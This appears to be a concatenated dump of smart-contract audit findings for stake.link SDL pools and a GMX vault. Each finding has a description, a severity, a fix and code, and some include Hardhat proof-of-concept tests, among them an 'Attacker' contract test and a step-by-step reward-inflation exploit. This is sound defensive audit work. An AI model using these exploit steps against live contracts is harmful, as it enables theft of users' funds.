There is no way to revoke the approval which given via the approvefunction They may able execute transfers even after the owner revokes their permission using the `setApprovalForAll` function.\\nThe `setApprovalForAll` function allows the owner to approve anyone as the operator.\\n```\\n function setApprovalForAll(address _operator, bool _approved) external {\\n address owner = msg.sender;\\n if (owner == _operator) revert ApprovalToCaller();\\n\\n operatorApprovals[owner][_operator] = _approved;\\n emit ApprovalForAll(owner, _operator, _approved);\\n }\\n```\\n\\nIn the same vein, the `approve` function allows the owner or operator to `approve` anyone to transfer the lock.\\n```\\n function approve(address _to, uint256 _lockId) external {\\n address owner = ownerOf(_lockId);\\n\\n if (_to == owner) revert ApprovalToCurrentOwner(); //@note\\n if (msg.sender != owner && !isApprovedForAll(owner, msg.sender)) revert SenderNotAuthorized();\\n\\n tokenApprovals[_lockId] = _to;\\n emit Approval(owner, _to, _lockId);\\n }\\n```\\n\\nNote that in the function, lock cannot be approved to the owner (but can be approved to any of the operators), and can be called by the owner/operator (see the `isApprovedForAll` modifier).\\nIf the operator approves himself to the lock, using the `approve` function, and later on, his operator status gets revoked, his lock approval status is not cleared, meaning he still has access to the lock.\\nAs an extreme example\\nUser1 owns 5 locks.\\nHe calls the `setApprovalForAll` setting User2 as his operator.\\nUser2 calls the `approve` function on all 5 locks (It succeeds as there's no check preventing this unlike with the lock owner), getting herself both operator approval and token approvals.\\nUser1 revokes User2's operator status.\\nUser2 still has access to the locks and can transfer them.
No way to revoke approval in the SDLPool might lead to unauthorized calling transfer of locks.\\nInclude a check to see if the `_to` in the `approve` function is an operator, revert if it is. Or clear an operator's token approvals after revoking his operator status.
Uncleared approval, gives access to transfer token.
```\\n function setApprovalForAll(address _operator, bool _approved) external {\\n address owner = msg.sender;\\n if (owner == _operator) revert ApprovalToCaller();\\n\\n operatorApprovals[owner][_operator] = _approved;\\n emit ApprovalForAll(owner, _operator, _approved);\\n }\\n```\\n
A user can lose funds in `sdlPoolSecondary` if tries to add more sdl tokens to a lock that has been queued to be completely withdrawn
medium
In a secondary chain, if a user adds more sdl amount into a lock that he has queued to withdraw all the amount in the same index batch, he will lose the extra amount he deposited\\nThe process to withdraw all the funds from a lock in a primary chain is just by calling withdraw with all the base amount of the lock. At this point the user will get immediately his funds back and the lock will be deleted, hence the owner will be zero address.\\nHowever, in a secondary chain, a user has to queue a withdraw of all the funds and wait for the keeper to send the update to the primary chain to execute the updates and then receive his sdl token back. In this period of time when the keeper does not send the update to the primary chain, if a user queues a withdraw of all the lock base amount, he will still own the lock because the withdraw has not been executed, just queued. So the user can still do whatever modification in his lock, for example, increase his lock base amount by calling `transferAndCall()` in the `sdlToken` passing the address of the `sdlSecondaryPool` as argument.\\nIf this happens, when the keeper send the update to the primary chain and the user executes the updates for his lockId, he will lose this extra amount he deposited because it will execute the updates in order, and it will start with the withdraw of all the funds, will delete the ownership (make the zero address as the owner), and then increase the base amount of the lock that now owns the zero address.\\nAnd basically the lockId will be owned by the zero address with base amount as the extra sdl tokens that the user sent.\\nIt is written inside `sdl-pool-secondary.test.ts` because it uses its setup\\n```\\n it('PoC user will lose extra deposited tokens', async () => {\\n\\n let user = accounts[1]\\n let initialUserSDLBalance = await sdlToken.balanceOf(user);\\n\\n // User creates a lock depositing some amount\\n await sdlToken\\n .connect(signers[1])\\n .transferAndCall(\\n sdlPool.address,\\n toEther(100),\\n ethers.utils.defaultAbiCoder.encode(['uint256', 'uint64'], [0, 0])\\n )\\n\\n await sdlPool.handleOutgoingUpdate()\\n await sdlPool.handleIncomingUpdate(1)\\n await sdlPool.connect(signers[1]).executeQueuedOperations([])\\n\\n assert.equal(await sdlPool.ownerOf(1), user)\\n \\n // User queues a withdraw of all the amount from the lock\\n await sdlPool.connect(signers[1]).withdraw(1, toEther(100))\\n\\n // User wants to deposit more tokens to the lock without the withdraw being updated and still being in the queue\\n await sdlToken\\n .connect(signers[1])\\n .transferAndCall(\\n sdlPool.address,\\n toEther(1000),\\n ethers.utils.defaultAbiCoder.encode(['uint256', 'uint64'], [1, 0])\\n )\\n\\n await sdlPool.handleOutgoingUpdate()\\n await sdlPool.handleIncomingUpdate(2)\\n // When executing the updates, zero address will be the owner of his lock\\n // and the amount he diposited the last time will be lost\\n await sdlPool.connect(signers[1]).executeQueuedOperations([1])\\n\\n let finalUserSDLBalance = await sdlToken.balanceOf(user);\\n let sdlLost = initialUserSDLBalance.sub(finalUserSDLBalance)\\n\\n console.log("The user has lost", sdlLost.toString(), "sdl tokens")\\n\\n // This staticall should revert because now the lock owner is the zero address\\n await expect(sdlPool.ownerOf(1)).to.be.revertedWith('InvalidLockId()')\\n })\\n```\\n\\nOutput:\\n```\\n SDLPoolSecondary\\nThe user has lost 1000000000000000000000 sdl tokens\\n ✔ PoC user is not able to execute his lock updates (159ms)\\n\\n\\n 1 passing (3s)\\n```\\n
When trying to do any action on a lock in a secondary pool, check if the last update queued has not 0 as the base amount. Because if it is the case, that would mean that the user queued a withdraw of all funds and he will lose ownership of the lock at the next keeper update.\\n```\\n function _queueLockUpdate(\\n address _owner,\\n uint256 _lockId,\\n uint256 _amount,\\n uint64 _lockingDuration\\n ) internal onlyLockOwner(_lockId, _owner) {\\n Lock memory lock = _getQueuedLockState(_lockId);\\n// Add the line below\\n if(lock.amount == 0) revert();\\n LockUpdate memory lockUpdate = LockUpdate(updateBatchIndex, _updateLock(lock, _amount, _lockingDuration));\\n queuedLockUpdates[_lockId].push(lockUpdate);\\n queuedRESDLSupplyChange // Add the line below\\n=\\n int256(lockUpdate.lock.amount // Add the line below\\n lockUpdate.lock.boostAmount) -\\n int256(lock.amount // Add the line below\\n lock.boostAmount);\\n if (updateNeeded == 0) updateNeeded = 1;\\n\\n emit QueueUpdateLock(_owner, _lockId, lockUpdate.lock.amount, lockUpdate.lock.boostAmount, lockUpdate.lock.duration);\\n }\\n```\\n
High, user will lose funds
```\\n it('PoC user will lose extra deposited tokens', async () => {\\n\\n let user = accounts[1]\\n let initialUserSDLBalance = await sdlToken.balanceOf(user);\\n\\n // User creates a lock depositing some amount\\n await sdlToken\\n .connect(signers[1])\\n .transferAndCall(\\n sdlPool.address,\\n toEther(100),\\n ethers.utils.defaultAbiCoder.encode(['uint256', 'uint64'], [0, 0])\\n )\\n\\n await sdlPool.handleOutgoingUpdate()\\n await sdlPool.handleIncomingUpdate(1)\\n await sdlPool.connect(signers[1]).executeQueuedOperations([])\\n\\n assert.equal(await sdlPool.ownerOf(1), user)\\n \\n // User queues a withdraw of all the amount from the lock\\n await sdlPool.connect(signers[1]).withdraw(1, toEther(100))\\n\\n // User wants to deposit more tokens to the lock without the withdraw being updated and still being in the queue\\n await sdlToken\\n .connect(signers[1])\\n .transferAndCall(\\n sdlPool.address,\\n toEther(1000),\\n ethers.utils.defaultAbiCoder.encode(['uint256', 'uint64'], [1, 0])\\n )\\n\\n await sdlPool.handleOutgoingUpdate()\\n await sdlPool.handleIncomingUpdate(2)\\n // When executing the updates, zero address will be the owner of his lock\\n // and the amount he diposited the last time will be lost\\n await sdlPool.connect(signers[1]).executeQueuedOperations([1])\\n\\n let finalUserSDLBalance = await sdlToken.balanceOf(user);\\n let sdlLost = initialUserSDLBalance.sub(finalUserSDLBalance)\\n\\n console.log("The user has lost", sdlLost.toString(), "sdl tokens")\\n\\n // This staticall should revert because now the lock owner is the zero address\\n await expect(sdlPool.ownerOf(1)).to.be.revertedWith('InvalidLockId()')\\n })\\n```\\n
Can lock Fund for 1 sec and unlock in same transaction to gain profit
low
Can lock Fund for 1 sec and unlock in same transaction to gain profit even if it's small amount yet there's no flashloan protection so malicious user can flashloan big amount and sandwich the rebasing upkeep to take advantage of the pool with dividing leads to zero problem to gain profit from pool.This way totalstaked amount can be manupilated. Checkupkeep and performUkeep completely user accessible so totalstake amount can change for the favor of malicious user\\n\\n```\\nnpx hardhat test --network hardhat --grep 'usage of Attack contract and receiving NFT'\\n```\\n\\n```\\n import { Signer } from 'ethers'\\nimport { assert, expect } from 'chai'\\nimport {\\n toEther,\\n deploy,\\n getAccounts,\\n setupToken,\\n fromEther,\\n deployUpgradeable,\\n} from '../../utils/helpers'\\nimport {\\n ERC677,\\n LinearBoostController,\\n RewardsPool,\\n SDLPoolPrimary,\\n StakingAllowance,\\n Attacker\\n} from '../../../typechain-types'\\nimport { ethers } from 'hardhat'\\nimport { time } from '@nomicfoundation/hardhat-network-helpers'\\n//1 day in seconds// rest of code\\nconst DAY = 86400\\n\\n// parsing Lock struct in contracts// rest of code\\nconst parseLocks = (locks: any) =>\\n locks.map((l: any) => ({\\n amount: fromEther(l.amount),\\n //show 4 digits after decimal// rest of code\\n boostAmount: Number(fromEther(l.boostAmount).toFixed(10)),\\n startTime: l.startTime.toNumber(),\\n duration: l.duration.toNumber(),\\n expiry: l.expiry.toNumber(),\\n }))\\n\\n const parseData=(data:any)=>({\\n operator:data.operator,\\n from:data.from,\\n tokenId:data.tokenId,\\n data: Buffer.from(data.data.slice(2), 'hex').toString('utf8')\\n })\\n\\ndescribe('SDLPoolPrimary', () => {\\n let sdlToken: StakingAllowance\\n let rewardToken: ERC677\\n let rewardsPool: RewardsPool\\n let boostController: LinearBoostController\\n let sdlPool: SDLPoolPrimary\\n let signers: Signer[]\\n let accounts: string[]\\n let attacker:Attacker\\n before(async () => {\\n ;({ signers, accounts } = await getAccounts())\\n })\\n\\n beforeEach(async () => {\\n sdlToken = (await deploy('StakingAllowance', ['stake.link', 'SDL'])) as StakingAllowance\\n rewardToken = (await deploy('ERC677', ['Chainlink', 'LINK', 1000000000])) as ERC677\\n\\n await sdlToken.mint(accounts[0], toEther(1000000))\\n await setupToken(sdlToken, accounts)\\n\\n boostController = (await deploy('LinearBoostController', [\\n 4 * 365 * DAY,\\n 4,\\n ])) as LinearBoostController\\n\\n sdlPool = (await deployUpgradeable('SDLPoolPrimary', [\\n 'Reward Escrowed SDL',\\n 'reSDL',\\n sdlToken.address,\\n boostController.address,\\n ])) as SDLPoolPrimary\\n\\n rewardsPool = (await deploy('RewardsPool', [\\n sdlPool.address,\\n rewardToken.address,\\n ])) as RewardsPool\\n\\n await sdlPool.addToken(rewardToken.address, rewardsPool.address)\\n await sdlPool.setCCIPController(accounts[0])\\n //attack contract deployment -- setting bridge contract to same we wont need ccip here\\n attacker=await deploy("Attacker",[sdlPool.address,sdlPool.address,sdlToken.address]) as Attacker\\n await sdlToken.transfer(attacker.address,toEther(20000))\\n const sender = signers[0] // or choose any unlocked account\\n const valueToSend = ethers.utils.parseEther("100") // Amount of Ether to send\\n const tx = await sender.sendTransaction({\\n to: attacker.address,\\n value: valueToSend,\\n });\\n \\n await tx.wait();\\n console.log("Funded contract!");\\n })\\n it('should be able to lock an existing stake', async () => {\\n //with flashloan this may prove fatal// rest of code\\n await sdlToken.transferAndCall(\\n sdlPool.address,\\n toEther(10000),\\n ethers.utils.defaultAbiCoder.encode(['uint256', 'uint64'], [0, 0])\\n )\\n await sdlPool.extendLockDuration(1, 365 * DAY)\\n let ts = (await ethers.provider.getBlock(await ethers.provider.getBlockNumber())).timestamp\\n\\n assert.equal(fromEther(await sdlPool.totalEffectiveBalance()), 200)\\n assert.equal(fromEther(await sdlPool.totalStaked()), 200)\\n assert.equal(fromEther(await sdlPool.effectiveBalanceOf(accounts[0])), 200)\\n assert.equal(fromEther(await sdlPool.staked(accounts[0])), 200)\\n assert.deepEqual(parseLocks(await sdlPool.getLocks([1])), [\\n { amount: 100, boostAmount: 100, startTime: ts, duration: 365 * DAY, expiry: 0 },\\n ])\\n\\n // Move one block forward\\n //await ethers.provider.send('evm_mine', []);\\n //console.log("Parsed lock :",parseLocks(await sdlPool.getLocks([1])))\\n })\\n //@audit NFT onERC721receiver doesnt work it seems..\\n it('usage of Attack contract and receiving NFT', async () => {\\n console.log("Block-number before tx:",await ethers.provider.getBlockNumber())\\n let ts = (await ethers.provider.getBlock(await ethers.provider.getBlockNumber())).timestamp\\n // Move one block forward\\n await ethers.provider.send('evm_mine', [ts+1]);\\n console.log("SDLToken balance Before:",await sdlToken.balanceOf(attacker.address))\\n await attacker.attackTransfernCall()\\n console.log("Lock",parseLocks(await sdlPool.getLocks([1])))\\n console.log("Block-number after tx:",await ethers.provider.getBlockNumber())\\n console.log("Nft received ??:",await attacker.received());\\n//boostAmount: 0.0006341958 20_000 -> with flashloan\\n//boostAmount: 0.000006342 200 \\n })\\n})\\n```\\n
Setting lower-limit of locking time to stop bypassing 1 transaction lock-unlock-withdraw .This way it might stop the flashloan attacks too. Preferable minimum 1 day.
Loss of pool reward gained by rebasing.
```\\nnpx hardhat test --network hardhat --grep 'usage of Attack contract and receiving NFT'\\n```\\n
Attacker can exploit lock update logic on secondary chains to increase the amount of rewards sent to a specific secondary chain
medium
Users with existing reSDL NFTs on secondary chains (prior to a decrease in maxBoost) are able to increase `queuedRESDLSupplyChange` by a greater amount than should be possible given the current `maxBoost` value, which then allows them to funnel more rewards to their secondary chain (as `queuedRESDLSupplyChange` maps to `reSDLSupplyByChain[...]`, which is used to calculate the rewards distributed to each secondary chain).\\nConsider the scenario in which the stake.link team is decreasing the `maxBoost` value of the `LinearBoostController` so that newer depositors will get less rewards than OG depositors. This will allow an attacker on a secondary chain to perform the following attack to fraudulently increase the amount of rewards sent to their chain:\\nWe will assume for simplicity that the starting values for the `LinearBoostController` contract is a maxBoost=10 and `maxLockingDuration` = 10_000 seconds. The attacker starts with a single (for simplicity) reSDL NFT on a secondary chain which has amount=100_000 and lockingDuration= 5_000 seconds, meaning their boost is calculated to be: 100_000 * 10 * 5_000/10_000 = 500_000.\\nThen, the stake.link team decreases `maxBoost` to 5. Following this, the attacker will first call `SDLPoolSecondary:extendLockDuration` with a `_lockingDuration` of 9_999, which then calls the internal `_queueLockUpdate`, which is defined as follows:\\n```\\nfunction _queueLockUpdate(\\n address _owner,\\n uint256 _lockId,\\n uint256 _amount,\\n uint64 _lockingDuration\\n) internal onlyLockOwner(_lockId, _owner) {\\n Lock memory lock = _getQueuedLockState(_lockId);\\n LockUpdate memory lockUpdate = LockUpdate(updateBatchIndex, _updateLock(lock, _amount, _lockingDuration));\\n queuedLockUpdates[_lockId].push(lockUpdate);\\n queuedRESDLSupplyChange +=\\n int256(lockUpdate.lock.amount + lockUpdate.lock.boostAmount) -\\n int256(lock.amount + lock.boostAmount);\\n // rest of code\\n}\\n```\\n\\nAs part of this function call, `_updateLock` is triggered to perform this update, which is defined as follows:\\n```\\nfunction _updateLock(\\n Lock memory _lock,\\n uint256 _amount,\\n uint64 _lockingDuration\\n) internal view returns (Lock memory) {\\n if ((_lock.expiry == 0 || _lock.expiry > block.timestamp) && _lockingDuration < _lock.duration) {\\n revert InvalidLockingDuration();\\n }\\n\\n Lock memory lock = Lock(_lock.amount, _lock.boostAmount, _lock.startTime, _lock.duration, _lock.expiry);\\n\\n uint256 baseAmount = _lock.amount + _amount;\\n uint256 boostAmount = boostController.getBoostAmount(baseAmount, _lockingDuration);\\n\\n // rest of code\\n lock.boostAmount = boostAmount;\\n // rest of code\\n}\\n```\\n\\nMost important to note here is that (1) since the `_lockingDuration` of 9_999 is greater than the existing duration of 5_000, this call will succeed, and (2) the `boostAmount` is recalculated now using the new `maxBoost` value of 5. We can calculate the new attacker's `boostAmount` to be: 100_000 * 5 * 9_9999/10_000 = 499_950. Since this value is less than the previous 500_000, `queuedRESDLSupplyChange` in the `_queueLockUpdate` call will be decremented by 50.\\nAfter the `SDLPoolSecondary:extendLockDuration` function call is complete, this update will be queued. At some point an update to this secondary SDL pool will be triggered & once that's complete, the attacker will then be able to execute this update. To do so, the attacker calls `executeQueuedOperations`, specifying their reNFT, which then triggers `_executeQueuedLockUpdates` which has the following logic:\\n```\\n// rest of code\\nuint256 numUpdates = queuedLockUpdates[lockId].length;\\n\\nLock memory curLockState = locks[lockId];\\nuint256 j = 0;\\nwhile (j < numUpdates) {\\n if (queuedLockUpdates[lockId][j].updateBatchIndex > finalizedBatchIndex) break;\\n\\n Lock memory updateLockState = queuedLockUpdates[lockId][j].lock;\\n int256 baseAmountDiff = int256(updateLockState.amount) - int256(curLockState.amount);\\n int256 boostAmountDiff = int256(updateLockState.boostAmount) - int256(curLockState.boostAmount);\\n\\n if (baseAmountDiff < 0) {\\n // rest of code\\n } else if (boostAmountDiff < 0) {\\n locks[lockId].expiry = updateLockState.expiry;\\n locks[lockId].boostAmount = 0;\\n emit InitiateUnlock(_owner, lockId, updateLockState.expiry);\\n } else {\\n // rest of code\\n }\\n // rest of code\\n}\\n// rest of code\\n```\\n\\nRecall that the attacker only has a single update, with the only difference being the decrease of 50 for the `boostAmount`. This will trigger the logic based on the `boostAmountDiff < 0` statement which will set `locks[lockId].boostAmount = 0`. This is clearly incorrect logic & will allow the attacker to then fraudulently increase `queuedRESDLSupplyChange`, which will ultimately lead to more rewards going to this secondary chain.\\nContinuing this attack, the attacker will again call `SDLPoolSecondary:extendLockDuration`, but this time with a `_lockingDuration` of 10_000. Referencing the same code snippet as earlier, in `_updateLock`, `boostAmount` is now being calculated as: 100_000 * 5 * 10_000/10_000 = 500_000. In `_queueLockUpdate`, `queuedRESDLSupplyChange` is calculated to be: (100_000 + 500_000) - (100_000 + 0) = 500_000, based on this equation:\\n```\\nqueuedRESDLSupplyChange +=\\n int256(lockUpdate.lock.amount + lockUpdate.lock.boostAmount) -\\n int256(lock.amount + lock.boostAmount);\\n```\\n\\nRecall that this value of 0 comes from the improper logic in the `_executeQueuedLockUpdates` function call. Ultimately, in aggregate, `queuedRESDLSupplyChange` has been increased by 500_000 - 50 = 499_950. Had the attacker simply increased their locking duration to the max value of 10_000 after the update, there would be 0 change in the `queuedRESDLSupplyChange`.\\nThe fundamental bug here is that post a decrease in `maxBoost`, the update logic allows all existing reSDL NFTs to be able to increase `queuedRESDLSupplyChange` more than should be possible, & `queuedRESDLSupplyChange` is a major factor in terms of the percentage of rewards going to a given secondary chain.
The `_executeQueuedLockUpdates` function implicitly assumes if there's a decrease in `boostAmountDiff` then the lock update comes from calling `initiateUnlock`. There needs to be an additional case to handle this scenario due to a decrease in the `maxBoost`.
Users with existing reSDL NFTs on secondary chains (prior to a decrease in the maxBoost) are able to increase `queuedRESDLSupplyChange` by a greater amount than should be possible given the current `maxBoost` value, which then allows them to funnel more rewards to their secondary chain.
```\\nfunction _queueLockUpdate(\\n address _owner,\\n uint256 _lockId,\\n uint256 _amount,\\n uint64 _lockingDuration\\n) internal onlyLockOwner(_lockId, _owner) {\\n Lock memory lock = _getQueuedLockState(_lockId);\\n LockUpdate memory lockUpdate = LockUpdate(updateBatchIndex, _updateLock(lock, _amount, _lockingDuration));\\n queuedLockUpdates[_lockId].push(lockUpdate);\\n queuedRESDLSupplyChange +=\\n int256(lockUpdate.lock.amount + lockUpdate.lock.boostAmount) -\\n int256(lock.amount + lock.boostAmount);\\n // rest of code\\n}\\n```\\n
Updates from the `secondary pool` to the `primary pool` may not be sent because there are `no rewards` for the secondary pool
low
The SDLPoolCCIPControllerSecondary::performUpkeep() function is only available when there is a `message of rewards` from the `SDLPoolCCIPControllerPrimary`. That could be a problem if there are not rewards to distribute in a specific `secondary chain` causing that queue updates from the `secondarly chain` will not be informed to the `SDLPoolPrimary`.\\nThe `secondary chain` informs to the `primary chain` the new `numNewRESDLTokens` and `totalRESDLSupplyChange` using the SDLPoolCCIPControllerSecondary::performUpkeep function, then the `primary chain` receives the information and it calculates the new mintStartIndex. Note that the `primary chain` increments the `reSDLSupplyByChain` in the `code line 300`, this so that the `primary chain` has the information on how much supply of reSDL tokens there is in the secondary chain:\\n```\\nFile: SDLPoolCCIPControllerPrimary.sol\\n function _ccipReceive(Client.Any2EVMMessage memory _message) internal override {\\n uint64 sourceChainSelector = _message.sourceChainSelector;\\n\\n (uint256 numNewRESDLTokens, int256 totalRESDLSupplyChange) = abi.decode(_message.data, (uint256, int256));\\n\\n if (totalRESDLSupplyChange > 0) {\\n reSDLSupplyByChain[sourceChainSelector] += uint256(totalRESDLSupplyChange);\\n } else if (totalRESDLSupplyChange < 0) {\\n reSDLSupplyByChain[sourceChainSelector] -= uint256(-1 * totalRESDLSupplyChange);\\n }\\n\\n uint256 mintStartIndex = ISDLPoolPrimary(sdlPool).handleIncomingUpdate(numNewRESDLTokens, totalRESDLSupplyChange);\\n\\n _ccipSendUpdate(sourceChainSelector, mintStartIndex);\\n\\n emit MessageReceived(_message.messageId, sourceChainSelector);\\n }\\n```\\n\\nNow the mintStartIndex is send to the secondary chain code line 307 and the secondary chain receives the new mintStartIndex. This entire process helps to keep the information updated between the primary chain and the secondary chain.\\nOn the other hand, when a secondary chain receive rewards, the secondary chain can call the function SDLPoolCCIPControllerSecondary::performUpkeep since `shouldUpdate` is `true` at code line 157:\\n```\\nFile: SDLPoolCCIPControllerSecondary.sol\\n function _ccipReceive(Client.Any2EVMMessage memory _message) internal override {\\n if (_message.data.length == 0) {\\n uint256 numRewardTokens = _message.destTokenAmounts.length;\\n address[] memory rewardTokens = new address[](numRewardTokens);\\n if (numRewardTokens != 0) {\\n for (uint256 i = 0; i < numRewardTokens; ++i) {\\n rewardTokens[i] = _message.destTokenAmounts[i].token;\\n IERC20(rewardTokens[i]).safeTransfer(sdlPool, _message.destTokenAmounts[i].amount);\\n }\\n ISDLPoolSecondary(sdlPool).distributeTokens(rewardTokens);\\n if (ISDLPoolSecondary(sdlPool).shouldUpdate()) shouldUpdate = true;\\n }\\n } else {\\n uint256 mintStartIndex = abi.decode(_message.data, (uint256));\\n ISDLPoolSecondary(sdlPool).handleIncomingUpdate(mintStartIndex);\\n }\\n\\n emit MessageReceived(_message.messageId, _message.sourceChainSelector);\\n }\\n```\\n\\nOnce `shouldUpdate` is `true`, the function SDLPoolCCIPControllerSecondary::performUpkeep can be called in order to send the new information (numNewRESDLTokens and totalRESDLSupplyChange) to the primary chain:\\n```\\n function performUpkeep(bytes calldata) external {\\n if (!shouldUpdate) revert UpdateConditionsNotMet();\\n\\n shouldUpdate = false;\\n _initiateUpdate(primaryChainSelector, primaryChainDestination, extraArgs);\\n }\\n```\\n\\nThe problem is that the `primary chain` needs to send rewards to the `secondary chain` so that `shouldUpdate` is true and the function SDLPoolCCIPControllerSecondary::performUpkeep can be called. However, in certain circumstances it is possible that the `secondary chain` may never be able to send information to the `primary chain` since there may not be any rewards for the `secondary chain`. Please consider the next scenario:\\n`UserA` stakes directly in the `secondary chain` and the queuedRESDLSupplyChange increments\\nThe increase in supply CANNOT be reported to the `primary chain` since `shouldUpdate = false` and the function SDLPoolCCIPControllerSecondary::performUpkeep will be reverted.\\nRewards are calculated on the `primary chain`, however because the `secondary chain` has not been able to send the new supply information, zero rewards reSDLSupplyByChain will be calculated for the `secondary chain` since `reSDLSupplyByChain[chainSelector]` has not been increased with the new information from `step 1`.\\nSince there are NO rewards assigned for the `secondary chain`, it is not possible to set `shouldUpdate=True`, therefore the function SDLPoolCCIPControllerSecondary::performUpkeep will be reverted.\\nThe following test shows that a user can send `sdl` tokens to the `secondary pool` however SDLPoolCCIPControllerSecondary::performUpkeep cannot be called since there are no rewards assigned to the secondary pool:\\n```\\n// File: test/core/ccip/sdl-pool-ccip-controller-secondary.test.ts\\n// $ yarn test --grep "codehawks performUpkeep reverts"\\n// \\n it('codehawks performUpkeep reverts', async () => {\\n await token1.transfer(tokenPool.address, toEther(1000))\\n let rewardsPool1 = await deploy('RewardsPool', [sdlPool.address, token1.address])\\n await sdlPool.addToken(token1.address, rewardsPool1.address)\\n assert.equal(fromEther(await sdlPool.totalEffectiveBalance()), 400)\\n assert.equal((await controller.checkUpkeep('0x'))[0], false)\\n assert.equal(await controller.shouldUpdate(), false)\\n //\\n // 1. Mint in the secondary pool\\n await sdlToken.transferAndCall(\\n sdlPool.address,\\n toEther(100),\\n ethers.utils.defaultAbiCoder.encode(['uint256', 'uint64'], [0, 0])\\n )\\n //\\n // 2. The secondary pool needs to update data to the primary chain but the `controller.shouldUpdate` is false so `performUpkeep` reverts the transaction\\n assert.equal(await sdlPool.shouldUpdate(), true)\\n assert.equal((await controller.checkUpkeep('0x'))[0], false)\\n assert.equal(await controller.shouldUpdate(), false)\\n await expect(controller.performUpkeep('0x')).to.be.revertedWith('UpdateConditionsNotMet()')\\n })\\n```\\n
Updates from the `secondary pool` to the `primary pool` may not be sent because there are `no rewards` for the `secondary pool`\\nThe SDLPoolCCIPControllerSecondary::performUpkeep function may check if the `secondary pool` has new information and so do not wait for rewards to be available for the secondary pool:\\n```\\n function performUpkeep(bytes calldata) external {\\n// Remove the line below\\n// Remove the line below\\n if (!shouldUpdate) revert UpdateConditionsNotMet();\\n// Add the line below\\n// Add the line below\\n if (!shouldUpdate && !ISDLPoolSecondary(sdlPool).shouldUpdate()) revert UpdateConditionsNotMet();\\n\\n shouldUpdate = false;\\n _initiateUpdate(primaryChainSelector, primaryChainDestination, extraArgs);\\n }\\n```\\n
`numNewRESDLTokens` and `totalRESDLSupplyChange` updates from the `secondary pool` to the `primary pool` may not be executed, causing the rewards calculation to be incorrect for each chain.\\nTools used\\nManual review
```\\nFile: SDLPoolCCIPControllerPrimary.sol\\n function _ccipReceive(Client.Any2EVMMessage memory _message) internal override {\\n uint64 sourceChainSelector = _message.sourceChainSelector;\\n\\n (uint256 numNewRESDLTokens, int256 totalRESDLSupplyChange) = abi.decode(_message.data, (uint256, int256));\\n\\n if (totalRESDLSupplyChange > 0) {\\n reSDLSupplyByChain[sourceChainSelector] += uint256(totalRESDLSupplyChange);\\n } else if (totalRESDLSupplyChange < 0) {\\n reSDLSupplyByChain[sourceChainSelector] -= uint256(-1 * totalRESDLSupplyChange);\\n }\\n\\n uint256 mintStartIndex = ISDLPoolPrimary(sdlPool).handleIncomingUpdate(numNewRESDLTokens, totalRESDLSupplyChange);\\n\\n _ccipSendUpdate(sourceChainSelector, mintStartIndex);\\n\\n emit MessageReceived(_message.messageId, sourceChainSelector);\\n }\\n```\\n
depositors face immediate loss in case `equity = 0`
medium
The vulnerability in the `valueToShares` function exposes users to significant losses in case the equity `(currentAllAssetValue - debtBorrowed)` becomes zero due to strategy losses, users receive disproportionately low shares, and take a loss Immediately.\\nWhen a user deposits to the contract, the calculation of the shares to be minted depends on the `value` of `equity` added to the contract after a successful deposit. In other words:\\n`value` = `equityAfter` - `equityBefore`, while:\\n`equity` = `totalAssetValue` - `totalDebtValue`. and we can see that here :\\n```\\n function processDeposit(GMXTypes.Store storage self) external {\\n self.depositCache.healthParams.equityAfter = GMXReader.equityValue(self);\\n self.depositCache.sharesToUser = GMXReader.valueToShares(\\n self,\\n self.depositCache.healthParams.equityAfter - self.depositCache.healthParams.equityBefore,\\n self.depositCache.healthParams.equityBefore\\n );\\n\\n GMXChecks.afterDepositChecks(self);\\n }\\n // value to shares function :\\n\\n function valueToShares(GMXTypes.Store storage self, uint256 value, uint256 currentEquity)\\n public\\n view\\n returns (uint256)\\n {\\n\\n uint256 _sharesSupply = IERC20(address(self.vault)).totalSupply() + pendingFee(self); // shares is added\\n if (_sharesSupply == 0 || currentEquity == 0) return value;\\n return value * _sharesSupply / currentEquity;\\n }\\n```\\n\\nNOTICE: When the equity value is `0`, the shares minted to the user equal the deposited value itself. The equity value can become zero due to various factors such as strategy losses or accumulated lending interests... ect\\nIn this scenario, the user immediately incurs a loss, depending on the total supply of `svToken` (shares).\\nConsider the following simplified example:\\nThe total supply of `svToken` is (1,000,000 * 1e18) (indicating users holding these shares).\\nthe equity value drops to zero due to strategy losses and a user deposits 100 USD worth of value,\\nDue to the zero equity value, the user is minted 100 shares (100 * 1e18).\\nConsequently, the value the user owns with these shares immediately reduces to 0.001 USD. `100 * 100 * 1e18 / 1,000,000 = 0.001 USD` (value * equity / totalSupply).\\nIn this case, the user immediately shares their entire deposited value with these old minted shares and loses their deposit, whereas those old shares should be liquidated some how.\\nNotice: If the total supply is higher, the user loses more value, and vice versa.
use a liquidation mechanism that burns the shares of all users when equity drops to zero.
users face immediate loss of funds in case equity drops to zero
```\\n function processDeposit(GMXTypes.Store storage self) external {\\n self.depositCache.healthParams.equityAfter = GMXReader.equityValue(self);\\n self.depositCache.sharesToUser = GMXReader.valueToShares(\\n self,\\n self.depositCache.healthParams.equityAfter - self.depositCache.healthParams.equityBefore,\\n self.depositCache.healthParams.equityBefore\\n );\\n\\n GMXChecks.afterDepositChecks(self);\\n }\\n // value to shares function :\\n\\n function valueToShares(GMXTypes.Store storage self, uint256 value, uint256 currentEquity)\\n public\\n view\\n returns (uint256)\\n {\\n\\n uint256 _sharesSupply = IERC20(address(self.vault)).totalSupply() + pendingFee(self); // shares is added\\n if (_sharesSupply == 0 || currentEquity == 0) return value;\\n return value * _sharesSupply / currentEquity;\\n }\\n```\\n
incorrect handling of compound cancelation lead vault to stuck at `compound_failed` status
medium
the compound function allows the keeper to swap a token for TokenA or TokenB and add it as liquidity to `GMX`. However, if the deposit get cancelled, the contract enters a `compound_failed` status. leading to a deadlock and preventing further protocol interactions.\\n-The `compound` function is invoked by the keeper to swap a token held by the contract (e.g., from an airdrop as sponsor said) for TokenA or TokenB. Initially, it exchanges this token for either tokenA or tokenB and sets the status to `compound`. Then, it adds the swapped token as liquidity to `GMX` by creating a deposit:\\n```\\n function compound(GMXTypes.Store storage self, GMXTypes.CompoundParams memory cp) external {lt\\n if (self.tokenA.balanceOf(address(self.trove)) > 0) {\\n self.tokenA.safeTransferFrom(address(self.trove), address(this), self.tokenA.balanceOf(address(self.trove)));\\n }\\n if (self.tokenB.balanceOf(address(self.trove)) > 0) {\\n self.tokenB.safeTransferFrom(address(self.trove), address(this), self.tokenB.balanceOf(address(self.trove)));\\n }\\n\\n uint256 _tokenInAmt = IERC20(cp.tokenIn).balanceOf(address(this));\\n\\n // Only compound if tokenIn amount is more than 0\\n if (_tokenInAmt > 0) {\\n self.refundee = payable(msg.sender); 